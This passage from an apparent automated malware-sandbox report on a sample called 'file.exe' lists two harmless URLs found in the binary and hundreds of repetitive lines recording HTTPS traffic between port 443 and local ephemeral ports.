              Source: file.exe, 00000000.00000003.2291397449.00000000059A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
              Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
